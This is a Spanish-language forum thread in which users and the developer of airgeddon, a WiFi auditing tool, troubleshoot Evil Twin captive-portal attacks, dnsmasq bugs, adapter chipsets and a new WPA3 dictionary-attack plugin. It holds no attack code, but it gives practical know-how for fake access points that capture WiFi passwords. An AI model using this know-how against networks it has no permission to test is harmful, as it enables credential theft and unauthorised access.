el debug de q? de airgeddon? si te refieres al de airgeddon no... ya que eso es solo para ver las llamadas a las funciones e ir viendo por donde pasa el script.

Es que eso sin tener un iphone así de moderno me va a ser imposible de tratar... pero bueno, voy a preguntar por el grupo de discord a ver si a alguien más le pasa y a ver si alguien con iphone puede hacer algunas pruebas...

q version de airgeddon está usando la persona con el problema del iphone? entiendo que airgeddon v11.0, no?

el iphone no tiene nada que ver , te esta diciendo que en versiones viejas funciona ok , no tiene sentido que en versiones mas nuevas no funcione , tiene que ser alguna configuracion algun ejecutable que ha cambiado algun argumento o alguna ruta de algun fichero.

la mejor forma de que puedas mirarlo es bajar la iso de wifislax-current y mirarlo hay.
https://mega.nz/file/DtQXFQyT#b1XMJT-ZnClIOqc1aa0gHZdnHK7eYbXxN7GDSIqvpSA
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 01-02-2022, 22:43 (Martes)
Hombre, digo lo del iphone porque ya he tenido experiencias en el pasado de ese tipo... que el portal se abría para todo el mundo y todos los navegadores pero en iphone no. Y se hicieron cambios para que volviese a funcionar en todos los dispostivos. Además, él mismo dice que el portal se le abre bien en otros dispositivos y que con el iphone no... así que todo apunta a que es precisamente eso, el iphone. Pero vamos, que no me cuesta nada bajar wifislax y probarlo... aunque con casi total seguridad me voy a encontrar con que a mí me funciona bien con mi android o cualquier otro dispositivo que conecte (aunque yo no tengo iphones).

Dadme unos días que ando muy liado, pero tan pronto pueda pondré por aquí el resultado de las pruebas, y si es lo que me temo... va a ser un problema puesto que para solucionarlo voy a necesitar un iphone y la verdad es que no estoy por la labor de comprarme uno  ^-^

Gracias y saludos!
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 01-02-2022, 22:56 (Martes)
El celular donde no me salta el portal cautivo es un iphone y tiene IOS 14.6, con otros dispositivos no he probado

No , lee mas despacio .... no ha probado otros.

He insisto en que si antes le funcionaba , no veo por que ahora debiera ser un problema , te esta diciendo

PRUEBO EN WIFISLAX 2.4 Y TODO VA BIEN

PRUEBO EN ISO MAS MODERNA Y NO VA

Algo ha cambiado en la iso moderna , ... pero no tengo ni idea por que tampoco tengo 2 tarjetas ahora mismo para probar.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 01-02-2022, 23:03 (Martes)
Juas... tienes toda la puñetera razón... es q voy a todo gas por la vida porque no tengo tiempo de naaaaaaaaaaaaa

Ok, pues ya me he liado... descargando la iso y lo voy a probar a ver si puedo ahora mismo porque ya me chirría mucho esto... jejeje. Os cuento pronto.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 01-02-2022, 23:20 (Martes)
Probado y funcionando en live.... así que no se... mi android se conecta, sale el portal cautivo automáticamente y todo bien... captura la pass y todo perfecto. He instalado una vm y he probado de nuevo... y lo mismo. Todo ok. He probado con otro dispositivo android de otra versión y también ok. Así que yo no me preocuparía por nada que tenga que ver con la distro... será un fallo puntual de este usuario de vete a saber que configuración o circunstancia especial. Que lo pruebe con otro dispositivo él mismo... que seguro que le funciona.

P.D. solo estoy teniendo algunas "movidas" con las vmware tools que tras instalarlas ya se expande el escritorio, funciona el portapapeles etc, pero luego al reiniciar no se se arrancan solas y no sé por qué es... pero bueno, eso no tiene nada que ver. El caso es que les paso el instalador de nuevo y ya tira (para esa sesión). Lo comento por si ayuda o sirve de algo o por si quieres que haga alguna prueba. Las vmware tools que he metido son las del cd de mi instalación de vmware... no se si wifislax ya trae algún módulo y se debería hacer de otra forma.

Saludos.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 01-02-2022, 23:24 (Martes)
Lo has probado en la iso que te he puesto el link aqui , supongo, que es la current gris y azul plasma 5

si es asi ,ya no podemos hacer mucho mas.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 01-02-2022, 23:26 (Martes)
Si, del link q acabas de pasar...

Por otra parte, he visto que este airgeddon v11.0 no es el "released oficial" pues hay diferencias... supongo que lo pillaste antes de la release de ayer. Lo suyo es pillar el que está en master en github ahora que ya está released.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 01-02-2022, 23:27 (Martes)
Si, del link q acabas de pasar...

Por otra parte, he visto que este airgeddon v11.0 no es el "released oficial" pues hay diferencias... supongo que lo pillaste antes de la release de ayer. Lo suyo es pillar el que está en master en github ahora que ya está released.

si tranquilo , en mi pincho ya tengo la estable 11.0 pero no he subido iso , hasta que se probara esto por si tenia que cambiar alguna cosa , ya la proxima lleva la 11 estable.

Un saludo.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 01-02-2022, 23:29 (Martes)
Se supone que el 2 de febrero ya sale slackware 15.0 y ya podre sacar una de estas isos como -stable , ya solo se estan parcheando bugs , asi que pronto wifislax64-3.0  como version -stable
Título: Re:Script multiuso en bash, airgeddon
Publicado por: Xiop Jartep en 02-02-2022, 02:04 (Miércoles)
Una disculpa por la tardanza de contestar, andaba fuera.
Ya probe Airgeddon 11.0 que viene en Wifislax_29012022 y como dicen en un celular nokia con android 11 si me lanza el portal cautivo y captura la contraseña todo bien. En un celular samsung con android 5.1.1 se conecta a la red falsa pero no lanza el portal cautivo. En el iphone SE 1ra generacion que es del año 2016, osea un poco viejo no lanza el portal cautivo, aunque aparezca conectado a la red falsa, este iphone tiene un IOS 14.6 osea casi actual porque el IOS mas actual es el 15.3. Lo cierto es que en versiones anteriores de Wifislax 2.4 y 2.1 si me lanza el portal cautivo en este iphone y si captura la contraseña sin ningun problema.

Un saludo v1s1t0r y USUARIONUEVO
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 02-02-2022, 08:29 (Miércoles)
Pues de iphone no te puedo decir, pero a mí con un android viejo sí que me salta el portal cautivo y todo bien...
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 02-02-2022, 08:58 (Miércoles)
Es cierto que en alguna versión de android vieja puede pasar que en lugar de saltar directamente ponga esto:

(https://i.ibb.co/1nC6rCm/screenshot.png)

Es decir, que aparezca como notificación push y en el apartado de wifi y si le das un click ya se abre... pero eso no es algo que se pueda controlar en el lado de airgeddon ... lo está detectando correctamente como portal cautivo y ya depende del lado del cliente como comportarse... y por lo visto en algunas versiones y puede hacer esto que comento... pero no es que esté mal. Es que hay dos mil factores... la versión de android, la rom específica del teléfono, etc... mira a ver si en esos que dices que no te salta directamente lo que te está haciendo es esto que también se considera correcto.

y repito... en iphone ni idea... ojalá tuviera alguno para trastear...
Título: Re:Script multiuso en bash, airgeddon
Publicado por: AntonioJaen en 02-02-2022, 21:56 (Miércoles)
Hola, uso un adaptador tplink 722 con el chip atheros ar9271.
He descargado la ultima iso 29012022. He probado airgeddon, me crea el falso ap abierto, me conecto pero no sale el texto con el recuadro pidiendo que introduzca mi clave. Lo que aparece es un robot verde que dice "pagina web no disponible"  No ha sido posible cargar la pagina web http:/connect.rom.miui.com/generate_204 porque  net::ERR_NAME_NOT_RESOLVED

En el pc tampoco carga.

He probado en la misma iso con linset y todo va bien.

En la iso wifislax 64 1.1 wifimosys y linset funcionan correctamente.

Alguien sabe que ocurre para no funcionarme airgeddon?

Muchas gracias.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 02-02-2022, 22:37 (Miércoles)
Es raro porque a mí me funciona bien... por lo que dices de que no te resuelve... se supone que hay un "agujero negro DNS" que redirige cualquier cosa que pidas a la ip del portal cautivo... estaría bien si pusieras una captura de la pantalla para ver que ocurre en las distintas ventanas, ya que hay una (la azulita de enmedio a la derecha) que es la que hace la redirección DNS... y no se, quizás hay algún problema con eso... si hay un problema con la redirección DNS tendría sentido eso que te pasa... y tendría sentido que te pasase tanto en el móvil como cliente como en cualquier otro, ya que si no hay redirección DNS para uno, no la habrá para nadie lógicamente... necesitamos esa imagen para ver qué ocurre... a ver ese dnsmasq si está petando por algo.

La cuestión también es saber si en otras isos de wifislax te funciona bien airgeddon... porque eso no lo comentas.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: AntonioJaen en 02-02-2022, 23:37 (Miércoles)
A ver, he probado airgeddon en wifislax 64 1.1, donde me funcionan perfectamente linset y wifimosys.
Todo bien y mal con airgeddon, monta bien el falso ap, me conecta a la red falsa con el movil, me sale la pantalla para poner la clave y la escribo, pero cuando le digo comprobar la clave que he puesto, me sale el mismo fallo que antes, sin aparecer en la pantalla del pc la clave que he introducido buena o mala. Dejo imágenes:

(https://i.imgur.com/5pQS53v.jpg)

(https://i.imgur.com/eoiiWjc.jpg)

(https://i.imgur.com/o2ElaF7.jpg)

Si veis que aparece algun dato que no deba, decidmelo
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 02-02-2022, 23:46 (Miércoles)
Qué cosa más rara.... porque si no hubiera redirección DNS no llegarías ni a ver la pantalla que te pide la clave... a menos que la tengas ya cacheada en el navegador o alguna cosa rara... es que es muy raro porque a todos nos funciona... haz esta prueba:

Edita el fichero de configuración .airgeddonrc (está oculto porque comienza por un punto, como es habitual el linux en los ficheros ocultos). Lo encontrarás en la misma carpeta que airgeddon, que si no recuerdo mal será algo así como /usr/share/airgeddon , y una vez dentro modifica la línea donde pone AIRGEDDON_FORCE_IPTABLES=false y lo pones a true, es decir, así AIRGEDDON_FORCE_IPTABLES=true y luego lanzas de nuevo airgeddon y pruebas.

Y prueba de nuevo... a ver si es que por lo que sea tienes un problema con las nftables y que intervienen en redirecciones varias...

Si no es eso, ya no se que decirte... si tuvieras otro movil para probar... ¿ese android es viejuno? q version de android es?

bueno, ya nos cuentas...
Título: Re:Script multiuso en bash, airgeddon
Publicado por: AntonioJaen en 03-02-2022, 11:44 (Jueves)
v1s1t0r, no me ha dado tiempo a hacer lo que me has indicado.
Lo que si he hecho ha sido en la ultima iso, arrancar airgeddon 11 y me pasa exactamente lo mismo, solo que la pantalla donde puedo poner la clave no me sale, la que me sale es directamente la ultima del error.
Tengo un xioami 8 actualizado.
Probare con otro movil a ver.
Tambien haré lo que me has indicado.

Te voy diciendo.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: AntonioJaen en 03-02-2022, 21:41 (Jueves)
v1s1t0r, he probado la ultima airgeddon 11 de la ultima iso con un movil viejo. Ha ido todo perfecto. Será problema de mi xioami, jeje.
En el pc con win 10 no me aparece la pantalla de meter la clave.
Muchas gracias por todo.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 03-02-2022, 23:25 (Jueves)
A ver , yo no se si van a ir por hay las cosas , pero recuerdo que por ejemplo mi movil no me permite abrir paginas sino son HTTPS , si el portal cautivo es HTTP a secas , puede que no cargue por eso , pero no lo se seguro.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: Xiop Jartep en 04-02-2022, 04:43 (Viernes)
Ando probando Airgeddon 11 en Wifislax 2.4, Wifixlax 2.3, Wifislax 2.1 y Wifislax 1.1 y sin problema esta trabajando, lanza el portal cautivo y captura la contraseña desde un iphone SE 1ra generacion.
Tal parece entonces que no es problema de Airgeddon sino algo en las nuevas  isos de prueba de Wifixlax 3, almenos esa es mi sospecha, porque no me lanza el portal cautivo en Wifislax29012022 aunque si me conecta a la red falsa con este iphone.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: MR. sergio en 06-02-2022, 10:52 (Domingo)
airgeddon es compatible con wpa3 ??? ???
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 07-02-2022, 08:49 (Lunes)
airgeddon es compatible con wpa3 ??? ???
¿Sí? me acabo de enterar.

Desde que recientemente airodump ya deteccta wpa3, pues si tu versión de aircrack es moderna podrás ver y detectar redes wpa3 cuando escaneas, incluso podrás seleccionar una red de este tipo como objetivo. Pero luego no hay ningún ataque específico contra ellas. Las vulnerabilidades que salieron contra wpa3 hace tiempo como el dragonblood, en mi opinión fueron descubiertas demasiado pronto, antes de que los dispotsitivos con wpa3 inundasen el mercado haciendo que cuando hoy por hoy empieza a llegar el wpa3 poco a poco, todo venga ya parcheado contra ello por lo que no hay nada que hacer. Tampoco hay ninguna herramienta que explotase esto, solo una PoC cutre. Así que de momento poca cosa...

No obstante tengo pensado crear un plugin más adelante para hacer un ataque contra wpa3. Lo único que será con python y como quiero que la tool sea "pure bash" por eso será un plugin. Será un ataque online contra red wpa3... simplemente probando pass de una lista (diccionario) contra una red wpa3 de forma online. Evidentemente esto es muchísimo más lento que lo que se hacía antes con wpa2 de capturar un handshake y romperlo offline... pero de momento es lo que hay, y como digo, aún ni lo he desarrollado.

Saludos.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 09-02-2022, 22:45 (Miércoles)
Hechale un vistazo , puede ser una pista al problema del portal cautivo

https://foro.seguridadwireless.net/live-wifislax/wifislax-3-0-rc2/msg373434/?boardseen#new
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 09-02-2022, 22:55 (Miércoles)
Repito que a mí me funciona bien con la última iso q pasaste de wifislax.

También he probado con otros dnsmasq en otras distros y ha funcionado bien por ejemplo con la 2.85. Si con la 2.86 que trae la última iso de wifislax también va bien... a este usuario que le peta por algo, será por otra cosa, no por tema de versiones. Dice que le da error de config... pero la config que genera airgeddon para dnsmasq no ha cambiado desde el inicio... y ha funcionado en todas las versiones que hay hasta ahora, y repito, en la 2.86 también funciona. Así que no se por qué a él le da error de config... de hecho no conozco a nadie más que a esta persona que le de un error de dnsmasq. No se que se podría hacer... más bien nada. O no se me ocurre. Así que yo creo que no está relacionado con "lo del portal cautivo"... ojo, q "lo del portal cautivo" q es realmente? es q no le funciona a una persona... así que no se tampoco si tratarlo como algo que deba mirar.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 09-02-2022, 22:59 (Miércoles)
¿puede influir si neworkmanager esta en uso?

por ejemplo en una interface ethernet ?
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 09-02-2022, 23:16 (Miércoles)
pfff... no creo. Además, cuando lanzas el evil twin, a partir de no se que version (no recuerdo exactamente), hay una opción en el fichero .airgeddonrc (AIRGEDDON_FORCE_NETWORK_MANAGER_KILLING) que está seteada a true y que antes de lanzar el evil twin siempre lo mata... así que no será por eso...
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 22-04-2022, 19:12 (Viernes)
Hola! acaba de salir la nueva versión 11.01 de airgeddon. Incluye fixes y demás... pero lo más interesante es que los ataques que necesitan un handshake o PMKID para lanzarse contra WPA2, ahora se pueden lanzar también en redes WPA2/WPA3. Es decir, que airgeddon está adaptado para que si detecta que la red WPA3 trabaja en Mixed Mode soportando WPA2 también, pues todos esos ataques se pueden realizar también. Ha habido que hacer muchos cambios para soportar esto.

Lamentablemente de WPA3 aún seguimos sin grandes vulnerabilidades salvo por las que salieron demasiado temprano como el dragonblood que hizo que cuando WPA3 se ha extendido ya esté todo parcheado... hubiera sido muy distinto si eso se hubiera descubierto hoy por hoy, con miles de puntos de acceso en el mercado ya utilizando WPA3... pero como se descubrió tan pronto, pues no fue un "boom"... pero bueno. Desde airgeddon contra WPA3 se pueden hacer pequeñas cosas... los ataques DoS, todos los Evil Twin excepto el de portal cautivo... y poco más. Bueno, y con la nueva versión que ahora si la red WPA3 está en mixed mode usando WPA2 también pues que ya te deja también hacerle todo lo de WPA2... pero de momento es lo que hay.

Dejo el changelog por aquí:
Changelog:
 - Fixed busy ports checks
 - Added PIN to WPS trophy file
 - Fixed Evil Twin route problems for modern mobile devices (Android, Kali Nethunter, etc.)
 - Improvement in missing dependencies plugin to be able to check output when errors occur
 - Adapted WPA/WPA2 attacks (handshake capture, PMKID and Evil Twin captive portal) to work with WPA2/WPA3 mixed networks
 - Fix error launching sslstrip2 using old Bettercap 1.x

Saludos!
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 23-04-2022, 00:22 (Sábado)
Gracias , toca actualizar.

Por si no leiste o lo que sea, el problema que estabamos teniendo en la version nueva de wifislax con el portal cautivo , era por un bug en dnsmasq , concretamente la version 2.86 , haciendo downgrade a dnsmasq 2.85 se corregia el problema
Título: Re:Script multiuso en bash, airgeddon
Publicado por: MR. sergio en 23-04-2022, 04:16 (Sábado)
mdk3 funciona con los wpa3

ponen que los wpa3 no funciona con

los ataque dos ???
Título: Re:Script multiuso en bash, airgeddon
Publicado por: Xiop Jartep en 23-04-2022, 06:28 (Sábado)
Pues voy a actualizar, gracias por compartir y tener atendida tremenda herramienta.En un rato mas la estare probando y comento.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: pepe10000 en 23-04-2022, 09:36 (Sábado)
Hola! acaba de salir la nueva versión 11.01 de airgeddon. Incluye fixes y demás... pero lo más interesante es que los ataques que necesitan un handshake o PMKID para lanzarse contra WPA2, ahora se pueden lanzar también en redes WPA2/WPA3. Es decir, que airgeddon está adaptado para que si detecta que la red WPA3 trabaja en Mixed Mode soportando WPA2 también, pues todos esos ataques se pueden realizar también. Ha habido que hacer muchos cambios para soportar esto.

Lamentablemente de WPA3 aún seguimos sin grandes vulnerabilidades salvo por las que salieron demasiado temprano como el dragonblood que hizo que cuando WPA3 se ha extendido ya esté todo parcheado... hubiera sido muy distinto si eso se hubiera descubierto hoy por hoy, con miles de puntos de acceso en el mercado ya utilizando WPA3... pero como se descubrió tan pronto, pues no fue un "boom"... pero bueno. Desde airgeddon contra WPA3 se pueden hacer pequeñas cosas... los ataques DoS, todos los Evil Twin excepto el de portal cautivo... y poco más. Bueno, y con la nueva versión que ahora si la red WPA3 está en mixed mode usando WPA2 también pues que ya te deja también hacerle todo lo de WPA2... pero de momento es lo que hay.

Dejo el changelog por aquí:
Changelog:
 - Fixed busy ports checks
 - Added PIN to WPS trophy file
 - Fixed Evil Twin route problems for modern mobile devices (Android, Kali Nethunter, etc.)
 - Improvement in missing dependencies plugin to be able to check output when errors occur
 - Adapted WPA/WPA2 attacks (handshake capture, PMKID and Evil Twin captive portal) to work with WPA2/WPA3 mixed networks
 - Fix error launching sslstrip2 using old Bettercap 1.x

Saludos!

Genial.

Un modulito para los vagos,  ^-^  ^-^  ^-^

https://www.mediafire.com/file/cuwzw74fdyrorfr/airgeddon-11.01-wifislax.xzm/file

Un saludo.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: pepe10000 en 23-04-2022, 17:44 (Sábado)
Hola.

He estado haciendo algunas pruebas sobre WifiWay64 donde la versión anterior funciona correctamente.

En esta nueva he observado un mensajito raro supuestamente de la línea 117:

(https://imgur.com/6ey5zUJ.jpg)

Un saludo.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 04-05-2022, 18:30 (Miércoles)
Qué raro... lo miraré. Es la línea 117 pero no de airgeddon, sino del script que se genera para lanzar la ventana de control. Habrá que verlo en detalle e intentar reproducirlo... si no consigo reproducirlo no podré arreglarlo. ¿Alguna cosa especial que hicieras? ¿pasa siempre? ¿a veces? porque yo lo lanzo y no me ocurre.... ¿sistema operativo? (parece wifislax claro...) ¿version? supongo que 11.01 , chipset y tarjeta usada?

Gracias.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: pepe10000 en 04-05-2022, 18:43 (Miércoles)
Hola.

Nada especial.

Siempre.

WifiSlax y WifiWay.

Ocurre con la 11.01, la 11.02 Dev y la 11.02 Dev de hoy (acabo de probarla).

Wifistation con chipset Atheros AR9271.

En la versión 11.0 Dev no ocurre.

Editado.

En las dos últimas versiones el mensaje ha cambiado un poco, pero ocurre en la misma línea y sale algo de que se esperaba un operador binario si mal no recuerdo.

Un saludo.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 16-06-2022, 11:21 (Jueves)
Siento haber tardado un millón de años en contestar... he podido reproducir el error y lo voy a mirar. Gracias.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 16-06-2022, 12:16 (Jueves)
Arreglado!! si te bajas la versión 11.02 de la rama dev de Github podrás comprobar como ya no salen los mensajes de error. Aunque eran solo mensajes y todo funcionaba bien mostrando clientes conectados y mostrando el portal cautivo, todo funcionaba pero quedaba feo con unos errores ahí mostrados... ahora ya está como tiene que ser. Muchas gracias por el report. Lo de que me dijeses que en la versión 11.0 no pasaba fue vital para ir sobre mis pasos y ver en qué commit lo fastidié... y efectivamente lo encontré. Gracias!
Título: Re:Script multiuso en bash, airgeddon
Publicado por: pepe10000 en 16-06-2022, 12:20 (Jueves)
Hola.

Estupendo, voy a a bajarla y espero poder probar la nueva versión esta tarde,  ;)  ;)  ;)

De nada, a mandar,  >:(  >:(  >:(

Editado:

Probada y todo O.K.

Un modulito para que los más vagos la prueben:

https://www.mediafire.com/file/e8abof3yiu2vsz4/airgeddon-11.02.2-wifislax.xzm/file

Un saludo.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 17-06-2022, 05:17 (Viernes)
Buenas noticias entonces, me alegro , no se si actualizar la iso a una version dev o esperar a una nueva release.  ;) >:(
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 20-06-2022, 11:23 (Lunes)
No es un fallo importante ya que todo funcionaba igualmente aunque se mostrase un error. Yo esperaría, ya tampoco quedda mucho para una nueva release, pero como veas.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: AntonioJaen en 28-06-2022, 16:42 (Martes)
Tengo el usb wifi tp-link TL-WN722N v1 con el chip Atheros AR9271. En principio airgeddon monta bien la red falsa pero desaparece a los pocos minutos de estar a la espera. A veces al volver a tocarle con el ratón a las distintas ventanas, vuelve a aparecer y otras no. ¿Sabeis por que puede ser?

Muchas gracias
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 29-06-2022, 10:58 (Miércoles)
Hola, en teoría esa tarjeta que tienes posee un chipset de los compatibles y no deberías tener problemas. Además comentas que se levanta todo bien y que en primera instancia todo funciona.... si al rato deja de funcionar no sé que decirte, pero lo que te puedo decir es que airgeddon no realiza cambios en procesos hasta que paras el ataque así que parece que o bien tienes algo en el sistema que causa el problema pasado un rato, o bien la tarjeta pudiera tener un problema de hardware que hiciera que su uso continuado la hiciese fallar (aunque esto parece menos probable).

Respecto a eso que comentas de que al volver a tocar con el ratón vuelven a aparecer unas ventanas sí y otras no... esa parte no la estoy entendiendo... ¿te refieres a que salta alguna especie de salvapantallas o algo similar? si es así te diría que lo desactivases... pero vamos, q eso ya parece un problema ya más enfocado a las X o al vídeo que a otra cosa. A veces en las máquinas virtuales el vídeo da problemas. No sé si será tu caso o si estás usando Linux de forma nativa.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: AntonioJaen en 29-06-2022, 18:08 (Miércoles)
v1s1t0r muchas gracias por contestarme.

El usb wifi está bien, porque en wifislax 64 1.1 me funciona con wifimosys, linset y airgeddon. El problema es con la última versión de wifislax 3.1 y wifiway. En principio va todo bien, pero al ratillo deja de aparecer la "red abierta" para conectarse y si tocas en la pantalla en varias ventanas de las 6 que abre airgeddon, vuelve a aparecer la "red abierta" y ya si te puedes conectar desde el movil o pc. No tengo salvapantallas, las ventanas están siempre abiertas y la pantalla viéndose. No se, tal vez sea solo a mi.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: AntonioJaen en 15-07-2022, 11:15 (Viernes)
He estado haciendo pruebas y airgeddon me funciona correctamente hasta la version wifislax64-2.4. La version 3.0 y 3.1 es cuando me crea la falsa red abierta que a veces la veo otras veces no la veo (casi siempre) y no se por que será.
Uso el usb wifi tp-link TL-WN722N v1 con el chip Atheros AR9271 y he probado en distintos ordenadores. Siempre me ocurre lo mismo. Ademas he observado que el adaptador usb está algo mas "sordo" con las versiones de wifislax 3.0 y 3.1 (al escanear veo el 25 € de las redes cercanas).

Me podeis decir algo más?'

Un saludo.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 15-07-2022, 11:25 (Viernes)
No sé que decirte, pero por lo que comentas no creo que tenga que ver con airgeddon o que esté relacionado con algo del código fuente o alguna de las versiones... creo que poco puedo hacer aquí. Si en ciertas versiones de Wifislax te va bien el mismo airgeddon y la misma tarjeta y en otras no... igual puede estar relacionado con algo del driver... o del kernel que va de la mano con el driver. ¿Tienes otra tarjeta para probar? También imagino que habrás probado en alguna otra distro live tipo Kali o algo por el estilo... no sé como serán tus resultados.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: AntonioJaen en 15-07-2022, 13:34 (Viernes)
Pues he probado con la última version de wifiway32 que trae la misma version de airgeddon que wifislax 3.1. El resultado ha sido el mismo en ambos (aparece y desaparece la falsa red abierta).
Tengo otro usb wifi de otra marca pero con el mismo chip. Ocurre lo mismo.

Bueno, pues muchas gracias por la ayuda.

Un saludo.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 03-08-2022, 14:53 (Miércoles)
al fin, USUARIONUEVO . airgeddon v11.02 ya ha salido hoy!

https://github.com/v1s1t0r1sh3r3/airgeddon

Changelog:

-Fixed minor bug in minimum length setting while bruteforcing using hashcat
-Improvement hashcat use forcing it to use -m 22000 instead of old -m 2500 over handshakes cracking for hashcat modern versions
-Added WSL/WSL2 detection to force exit due to incompatibility
-Extended compatibility to use lspci 3.8 not accepting 0x
-Fixed error showing connected clients in Evil Twin captive portal attack

A disfrutar!
Título: Re:Script multiuso en bash, airgeddon
Publicado por: pepe10000 en 03-08-2022, 18:32 (Miércoles)
Muuuchas gracias campeón,  >:(  >:(  >:(

Un modulito para que los más vagos lo prueben:

https://www.mediafire.com/file/1u241pqcv4q0s1l/airgeddon-11.02-final-wifislax.xzm/file

Un saludo.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: AntonioJaen en 03-08-2022, 19:14 (Miércoles)
 Cuál es el mejor chipset USB para utilizar airgeddon en la ultima version de wifislax y realizar el ataque "evil twin" montando el portal cautivo con la "fake ap"?

Muchas gracias
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 03-08-2022, 22:10 (Miércoles)
Pues a actualizarme la iso.

GRACIAS
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 04-08-2022, 11:36 (Jueves)
Hola @AntonioJaen, aquí tienes en el wiki de airgeddon una lista de los chipsets que funcionan bien para hacer hacking wifi, así como un blacklist de los chipsets conocidos que dan problemas o que no tienen la capacidad hardware necesaria.

https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Cards%20and%20Chipsets

Saludos.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: AntonioJaen en 04-08-2022, 12:10 (Jueves)
Hola v1s1t0r:

Por los emoticonos se supone que los que mejor van son el MediaTek MT7612U y Ralink RT5572?????
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 04-08-2022, 12:26 (Jueves)
Si, antes de la tabla tienes una leyenda, donde pone "Rating legend"

Efectivamente, la Alfa AWUS036ACM es probablemente la mejor... peeeeeeeeeeero, lee bien los comentarios de la tabla. Tiene un inconveniente. No es apta para usarse en máquinas virtuales. Si la vas a usar en Linux nativo perfecto, pero si no, no compraría esa...

La Panda PAU09 sí que se puede usar en vms sin problemas.

Ten en cuenta que todas las de esa lista son aptas para wifi hacking... es decir, todas inyectan, todas soportan VIF (Virtual Interface), etc. No obstante, unas parecen mejor que otras... por el rango que alcanzan, porque soportan 5ghz y otras no, etc... incluso tienes ahí unos links directos a amazon que te pueden ser de utilidad.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: AntonioJaen en 04-08-2022, 19:37 (Jueves)
Gracias v1s1t0r:

Intentará pillar la Alfa AWUS036ACM ya que mis practicas las haré con la live cd de wifislax arrancada directamente.

Muchas gracias.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 31-08-2022, 22:31 (Miércoles)
Hola, acabo de publicar un plugin para atacar redes wpa3. Os dejo el link:

https://github.com/OscarAkaElvis/airgeddon-plugins

Ojo que requiere airgeddon v11.10 que aún no está released... tendréis que hacer git clone de la rama "dev" de github.

Saludos!
Título: Re:Script multiuso en bash, airgeddon
Publicado por: Xiop Jartep en 01-09-2022, 23:50 (Jueves)
A probar este avance para darle a las redes wpa3, gracias v1s1t0r por tener al dia este herramienta  >:( , vamos a darle a ver que...
Título: Re:Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 02-09-2022, 10:49 (Viernes)
supongo que basta con copiar la carpeta

wpa3_online_attack

con sus ficheros , dentro de la carpeta "plugins"  y ya estaria ¿verdad?

Gracias por seguir manteniendo la tool al dia.
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 02-09-2022, 11:10 (Viernes)
Si, todo lo q está dentro de esa carpeta q vaya a la carpeta plugins... en el readme del repo de plugins está bien explicado. Viene hasta un tree de como sería

~/airgeddon# tree
.
├── airgeddon.sh
├── known_pins.db
├── language_strings.sh
└── plugins
    ├── wpa3_online_attack.py
    ├── wpa3_online_attack.sh
    └── wpa_supplicant_binaries
        ├── wpa_supplicant_amd64
        ├── wpa_supplicant_arm64
        ├── wpa_supplicant_armel
        ├── wpa_supplicant_armhf
        └── wpa_supplicant_i386

Bueno, sé que este ataque es muy lento comparado con los clásicos de capturar handshake y romperlo offline. Está claro que no tiene comparación de velocidad... pero al menos es algo! porque contra WPA3 no hay nada!!! como ya sabeis, el handshake de wpa3 no se puede romper offline (al menos de momento). Y la única vuln importante contra wpa3 fue el dragon blood, pero en mi opinión salió demasiado pronto. Es decir, que se descubrió en una fase muy temprana antes de q el mercado se inundara de routers con WPA3, así que luego cuando estos están empezando a llegar pues ya está todo parcheado... hubiera sido muy distinto si esa vuln se hubiese descubierto ahora por ejemplo... otro gallo cantaría  >:D
Título: Re:Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 23-11-2022, 10:56 (Miércoles)
Hola, ya salió la nueva versión de airgeddon v11.10 , y también nueva versión del plugin para WPA3.

Saludos.
